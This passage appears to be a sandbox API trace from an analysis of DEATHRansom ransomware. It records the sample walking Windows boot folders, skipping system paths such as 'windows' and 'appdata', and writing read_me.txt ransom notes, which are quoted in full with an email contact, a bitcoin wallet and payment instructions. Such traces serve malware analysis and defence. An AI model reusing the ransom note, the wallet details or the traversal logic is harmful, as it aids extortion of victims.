ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.634] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0073.634] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.634] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.634] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0073.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.634] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.634] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0073.634] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.634] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.634] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt") returned 29 [0073.634] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt" (normalized: "c:\\boot\\hu-hu\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.634] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.634] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.635] CloseHandle (hObject=0x7a8) returned 1 [0073.635] GetProcessHeap () returned 0x280000 [0073.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.635] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0073.635] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0073.635] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0073.635] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0073.635] StrStrW (lpFirst="it-it", lpSrch="programdata") returned 0x0 [0073.636] StrStrW (lpFirst="it-it", lpSrch="$recycle.bin") returned 0x0 [0073.636] StrStrW (lpFirst="it-it", lpSrch="program files") returned 0x0 [0073.636] StrStrW (lpFirst="it-it", lpSrch="windows") returned 0x0 [0073.636] StrStrW (lpFirst="it-it", lpSrch="all users") returned 0x0 [0073.636] StrStrW (lpFirst="it-it", lpSrch="appdata") returned 0x0 [0073.636] GetProcessHeap () returned 0x280000 [0073.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.636] lstrcpyW (in: lpString1=0x8ab00b8, lpString2="\\\\?\\C:\\Boot\\it-IT" | out: lpString1="\\\\?\\C:\\Boot\\it-IT") returned="\\\\?\\C:\\Boot\\it-IT" [0073.636] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 12 [0073.636] QueueUserWorkItem (Function=0x40a710, Context=0x8ab00b8, Flags=0x0) returned 1 [0073.636] GetProcessHeap () returned 0x280000 [0073.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ac00c0 [0073.637] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0073.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.639] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0073.639] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.639] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.639] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0073.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.639] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.639] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0073.639] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.639] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.639] wnsprintfW (in: pszDest=0x8ac00c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\read_me.txt") returned 29 [0073.639] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\read_me.txt" (normalized: "c:\\boot\\it-it\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.640] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.640] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.640] CloseHandle (hObject=0x7a8) returned 1 [0073.641] GetProcessHeap () returned 0x280000 [0073.641] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ac00c0 | out: hHeap=0x280000) returned 1 [0073.641] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0073.641] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0073.641] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0073.641] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0073.641] StrStrW (lpFirst="ja-jp", lpSrch="programdata") returned 0x0 [0073.641] StrStrW (lpFirst="ja-jp", lpSrch="$recycle.bin") returned 0x0 [0073.641] StrStrW (lpFirst="ja-jp", lpSrch="program files") returned 0x0 [0073.641] StrStrW (lpFirst="ja-jp", lpSrch="windows") returned 0x0 [0073.641] StrStrW (lpFirst="ja-jp", lpSrch="all users") returned 0x0 [0073.641] StrStrW (lpFirst="ja-jp", lpSrch="appdata") returned 0x0 [0073.641] GetProcessHeap () returned 0x280000 [0073.641] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ac00c0 [0073.641] lstrcpyW (in: lpString1=0x8ac00c0, lpString2="\\\\?\\C:\\Boot\\ja-JP" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP") returned="\\\\?\\C:\\Boot\\ja-JP" [0073.641] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 13 [0073.641] QueueUserWorkItem (Function=0x40a710, Context=0x8ac00c0, Flags=0x0) returned 1 [0073.641] GetProcessHeap () returned 0x280000 [0073.641] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0073.642] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\*") returned 19 [0073.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.642] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0073.642] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.642] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.642] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.642] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0073.642] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.642] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.642] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0073.642] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.642] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.644] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt") returned 29 [0073.644] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt" (normalized: "c:\\boot\\ja-jp\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.644] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.644] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.645] CloseHandle (hObject=0x7a8) returned 1 [0073.645] GetProcessHeap () returned 0x280000 [0073.645] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ad00c8 | out: hHeap=0x280000) returned 1 [0073.645] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0073.645] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0073.645] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0073.645] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0073.645] StrStrW (lpFirst="ko-kr", lpSrch="programdata") returned 0x0 [0073.645] StrStrW (lpFirst="ko-kr", lpSrch="$recycle.bin") returned 0x0 [0073.645] StrStrW (lpFirst="ko-kr", lpSrch="program files") returned 0x0 [0073.646] StrStrW (lpFirst="ko-kr", lpSrch="windows") returned 0x0 [0073.646] StrStrW (lpFirst="ko-kr", lpSrch="all users") returned 0x0 [0073.646] StrStrW (lpFirst="ko-kr", lpSrch="appdata") returned 0x0 [0073.646] GetProcessHeap () returned 0x280000 [0073.646] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0073.646] lstrcpyW (in: lpString1=0x8ad00c8, lpString2="\\\\?\\C:\\Boot\\ko-KR" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR") returned="\\\\?\\C:\\Boot\\ko-KR" [0073.646] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 14 [0073.646] QueueUserWorkItem (Function=0x40a710, Context=0x8ad00c8, Flags=0x0) returned 1 [0073.646] GetProcessHeap () returned 0x280000 [0073.646] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ae00d0 [0073.647] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0073.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.647] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0073.647] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.647] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.647] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0073.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.647] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, 